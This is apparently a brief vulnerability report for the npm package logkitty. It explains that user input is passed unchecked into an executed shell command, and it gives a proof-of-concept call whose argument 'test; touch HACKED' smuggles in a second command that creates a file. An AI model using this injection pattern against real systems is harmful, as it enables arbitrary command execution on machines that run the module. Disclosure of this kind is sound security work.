The issue occurs because a user input
is formatted inside a command
that will be executed without any check.
HACKED
npm i logkitty # Install affected module
logkitty android app 'test; touch HACKED' # Note the *touch command* is inside the *'* (single quote), so it's an argument, while it will be executed anyway
HACKED
has been created